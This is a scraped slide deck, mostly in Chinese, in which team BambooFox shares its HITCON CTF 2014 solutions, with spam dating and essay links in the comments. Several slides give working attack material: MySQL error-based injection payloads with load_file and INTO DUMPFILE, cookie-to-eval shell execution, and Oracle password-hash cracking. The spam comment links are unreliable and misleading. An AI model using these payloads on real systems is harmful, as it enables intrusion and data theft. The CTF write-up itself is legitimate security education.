Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

HITCON CTF 2014 BambooFox 解題心得分享

7,288 views

Published on

This is about the experience in HITCON 2014.

Published in: Engineering
  • Sex in your area is here: ❤❤❤ http://bit.ly/2F7hN3u ❤❤❤
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Follow the link, new dating source: ❤❤❤ http://bit.ly/2F7hN3u ❤❤❤
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Hello! High Quality And Affordable Essays For You. Starting at $4.99 per page - Check our website! https://vk.cc/82gJD2
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

HITCON CTF 2014 BambooFox 解題心得分享

  1. 1. 陳仲寬(bletchley)
  2. 2. outline  BambooFox簡介  比賽思路  CTF檢討與改進  BambooFox未來目標
  3. 3. 很久很久以前  DSNS vs SQLab  攻擊專精實驗室  資安防守實驗室
  4. 4. 大敵當前  國際級CTF好手參與  PPP  Dragon Sector  9447  Blue-lotus  Oops  More Smoked Leet Chicken  ….
  5. 5. BambooFox
  6. 6. BambooFox  BambooFox = SQLab ∪ DSNSLab ∪ CSCC ∪ Some Friends  SQLab 軟體品質實驗室  DSNSLab 網路安全實驗室  CSCC 交大資工系計中  不同團隊的專業不同,更 可達到互補的效果
  7. 7. 解題心得  時間有限,這次分享只能涵蓋部分題目  各題標明的組員為分享內容的提供者  每題皆是多位成員合作解的,都有相當的貢 獻  大家忙著解題,所以本篇沒有太多照片….  我們計劃整理writeup讓大家參考
  8. 8. 資訊交流平台  Trello + Skype
  9. 9. 沒有人工智慧,只有強大的工人 智慧  Maze, Puzzle  有時題目會有很多例外狀況,寫程式不一 定會比較快  Maze 傳輸時有一些特殊字元,影響Parsing  部分成員比較沒有Security底子,可以先 來做這部分題目
  10. 10.  Use telnet connection to play a maze game  The whole maze map is actually a 91x91 QR code  To find the flag, we need to walk through all the places, record them and show on the screen  By computer?  By hand? Maze
  11. 11. maze - by hand  Why not just do by hand :D - easy to convert into real QR code - need to be very focus with pictures - can mark some routes when solving - hard to decode for QR code reader with words
  12. 12. Puzzle  找原圖來比較, 發現圖片內容沒差  Google  Wiki  轉向header分析,發現有JFXX*100  JFXX放的圖片截取出來  Write simple tools to make things easy  If you want to try, click this link  http://people.cs.nctu.edu.tw/~chhhsu/puzzle/
  13. 13. 24  Python的**(平方)和//(取整除數)  每個數字都可以在前面加上-變成負的  Permutation
  14. 14. 強大的網頁組  兩位業界的前輩為網頁定下基礎  補強的學生缺乏的實務經驗  網頁題變化性大,相關的技術太多,需要 快速學習吸收一些新的技術的能力
  15. 15.  PY4H4SHER  題目一開始就讓你可以下載py4h4sher.pl原始碼,有附上下 載的checksum,所以可以成功下載  下載後發現一共有四道關卡要越過 1. 沒有secret 情況下怎麼滿足_md5( SECRET + query_str ) == checksum: 2. if m_hash(stage1) != '4141414141414141': gotofail() 3. _pbkdf2(plaintext) != _pbkdf2(stage2): gotofail() 4. if _md5( stage3 ) != '90954349a0e42d8e4426a4672bde16b9': gotofail()  思路 1. 參數改用 POST躲過 checksum檢查 2. Stage1 利用 MySQL old password collision解過 3. Stage2 PBKDF2+HMAC collision (search by google) 4. Stage3 直接google md5hash很快就能找出stage3是 enigma , 難是難在 stage3 = stage3[0]+stage3[1]+stage3[3]+stage3[5] 這段,後來用 stage3=en&stage3=i&stage3=X&stage3=gm& stage3=X&stage3=a閃過,最後得解如下圖
  16. 16. Easyinj  以下是3個初步的線索  這題的奧妙之處就在於那個錯誤訊息的賤樣,不偏不倚告訴 我他是 mysql error-based injection ○ 一個最精簡的mysql error-based injection就長這樣 ' and (select 1 from(select count(),concat(@@version, floor(rand(0)2))x from log group by x)a))#  另一個奧妙之處是當你輸入一些敏感字串例如 select, from 他會被取代成 empty string  錯誤訊息裡面還有程式路徑,造成思路第一步就是下載程式 碼下來看 利用 load_file () ->又從錯誤訊息發現 .也會被取代 所以改成 load_file(0x433a5c5c57696e646f77735c5c7068702e696e 6920)  hex表示法  load_file 資料太長,會造成timeout_error,所以語法要再用 substr去分段切 , 最後成功把程式碼下載下來
  17. 17. Easyinj  發現有寫檔權限,且可以stack QUERY,並從前面的程式碼發現有個 資料夾log_guess^2/是用來寫log的  於是一個讀檔寫檔的語法就能變成這樣 54.238.22.67:10653/index.php?ip=');sselectelect%20LOload_file AD_FILE(0x433a5c5c57696e646f77735c5c7068702e696e6920) %20INintoTO%20DUMPdumpfileFILE%20'Z:AppServwwwlo g_guess^2jpeanut9'%23  最後我們這邊其實不知道怎麼繞過. 的bypass,不過既然有人有辦法 寫進來tedsdt.php ,不如我們就來看看他們寫了甚麼.php,LOAD 出來看就看到這個怪怪的東西 z:key_39uti2jb.txt  結果再去讀這個檔,裡面就有key XD
  18. 18. DIAGCGI  Core concept:  Curl : local file copy and rename  Download main perl cgi program  Check how the program identity user and verify  We can find how they apply the session argument  Eval() instead of parse it  Put code in that session file and get the flag
  19. 19. 外援通常很強大  沒看到題目就被解掉了
  20. 20. 團隊合作來解題  許多題目需要不同的思路才解的出來  溝通討論可以加速思緒的整理
  21. 21. 眾人合力的 polyglot  從defcon 22的polyglot開始思考  Defcon polyglot write shellcode compatible for differnet arches  This polyglot write script compatible for different langs  提出基本構想  讓程式碼互為註解  善用程式碼共通的語法  處理程式語言的歧異  大家瘋狂測試不同的語法  Use readfile in Haskell instead of system.cmd  有時候換人做做看會有不同的思路
  22. 22. Polyglot  `cat flag` in Python, C, Ruby, Haskell  String is comment in Python and Ruby  Use “”” “ to distinguish Python and Ruby string  In Ruby, everything is comment after __END__  # is C preprocessor command and it is single line comment in both Python and Ruby
  23. 23. Polyglot  {- Block Comment in Haskell -}  Make {- legal in other language  x={-"""1".to_i=>"2""".count(‘1’)};  It means x = { -1 } in Python and x = { -1 => 0 } in Ruby  Make it mean x = { -’1’ }; in C by inserting #ifdef in it  Use readFile instead of import System.Cmd to avoid the rule of “import must at the beginning of code” in Haskell
  24. 24. x={- #ifdef AAAAA """1".to_i=>"2""".count( #endif '1' #ifdef BBBBB ) #endif }; #include <stdlib.h> /* """ " print `cat flag` __END__ */ int main(){ system("cat flag"); } /* """ import sys, subprocess sys.stdout.write(subprocess.check_output(['cat', 'flag']).decode("utf-8")) # */ // -}1; main = readFile "flag" >>= putStr
  25. 25. Ducky  c source code 不能用();<>[]{}  發現stack可以執行,嘗試構建 個shellcode叫main  main[] = {“shellcode”} ○ Fail  utf8_t* main = “shellcode” ○ Fail  Main = first byte of shellcode Main1 = second byte ……
  26. 26. 一直做不出來的Binary  Binary的題目通常入門門檻高, 要有一定程度才能解題  Stkof  Ty  Callme  Sha1lcode  ….
  27. 27. 環境架設  將server架起來,動態分析  只用靜態分析不易找到問題  方便分析  測試自己的exploit
  28. 28. Ty  Ty – Arm64  Qemu  ARMv8 FVP Model  Debugging/Network  花了許多時間架設VM
  29. 29. 先丟input再說  測試常見漏洞  Long string  Format string  看有沒有crash或 其他線索
  30. 30. Rsbo  發現塞了長字串會crash  Read 0x80 into buffer size 80  DEP + ASLR  Buffer is random exchange  Fill zero into buffer  Make each byte of size exchange to 0x00  Bypass Randomize  Read more input  Try to call read_80_bytes again
  31. 31. Reverse Binary to Suedocode  沒有頭緒,先嘗試翻成suedo code來看  整理思緒  方便其他成員切入  Callme  找到bof,但遇到 stack cookie  考慮讀出stack cookie  或使用 exception handler  QQ
  32. 32. hop – reverse  Windows 64bit PE  It will print “Key:” and get input from user  Use “String Reference” to locate important code  The most import part is function “sub_401590”
  33. 33. hop - reverse  The program will “hop” by indirect jump to many positions, every code section will looks like  Note that “pop rax” is each char of input key  Just like a “function table lookup”. If our answer is wrong, it will return 0. Otherwise, it will return 1.
  34. 34. hop - reverse  We first find all code sections by scanning the binary of the binary pattern. There are over 130 of them.  By analyzing these sections, we can find all destination section of each section.  These sections are just like an “automata”, which reminds me of “automata - Boston Key Party 2014”.  Find the correct “path (key)”, which will steps over 40 states and finally get to the “return 1” state.
  35. 35. 比賽結果
  36. 36. CTF檢討與改進  Think your mistake and made it better next time
  37. 37. 比賽環境的事先準備  缺乏 arm, arm64的環境  怎麼可能會知道有HSA的題目…..  Girby  我們的Hsa專家出去度假了 T.T
  38. 38. 加強pwn, reverse的訓練  門檻高並且費時,但往往是決勝的關鍵 1. 環境安裝架設 2. 逆向工程 3. 程式分析,找出弱點 4. 攻擊代碼撰寫  此次多個題目卡在2 3兩步  繞過防禦機制的訓練不足
  39. 39. 適當的人力分配  由於人數眾多,且歧異度高  新竹, 臺北  資安背景, 無資安背景  早班,晚班  有發生資料沒同步好,多個人寫同個程式 的狀況發生
  40. 40. BambooFox未來目標  交大學生資安社群  CTF, 資安相關訓練  分享資安研究  積極參與資安競賽  國內外競賽
  41. 41. thanks  Thanks these members help me to prepare this slide  Ddaa  jpeanut  ding  Benson chen  Nier  Adavis10006  Lucaus wei  Ensky
  42. 42. Appendix
  43. 43. 心得  認知攻擊手法、瞭解手法的詳細內容,是增強資安 防護面向與深度的根本,而打WARGAME就是一 個很好的訓練方式,希望對資安有興趣的朋友多多 來打WARGAME。(Ding)  跟其他強隊的分數差距主要來自於 pwn 題型 未來 會更加強這部分的練習(ddaa)
  44. 44.  G8LA  Oracle CVE-2012-3137  找到FLAG這位使用者 =>AUTH_SESSKEY, AUTH_VFR_DATA  https://github.com/magnumripper/JohnTheRipper  john爆出m3o3rt m3odha m3odha後來做m3o開頭 的字典擋爆, 直到m3ow00才正確, 不曉得為啥跑出這 麼多組  DIAGCGI  改/tmp/cookie後可以執行shell  搞半天Xatierlike Lee直接cmd injection /read_key /key.txt
  45. 45. Finger  This is a Rock- paper-scissors game  It do md5 every 16 chars that you input and sum it and check later  If we can bypass boss attack then it is possible to win If guess wrong, che
  46. 46. Finger  We don’t want to find collision XD  We just cheat when we know boss is going to win, so boss cannot attack us  Boss win : our hp -1  Tie: both hp -0  We win: boss hp –rand(1..3)
  47. 47. Write ups (by xatierlike Lee)  http://pastebin.com/JqBFKfvu  Ey xatierlike Lee  http://ensky.logdown.com/posts/2014/08 /20/hitcon-ctf-2014-24  By ensky  http://ddaa.logdown.com/posts/221204- hitcon-ctf-2014-pwn-150-rsbo  By ddaa

×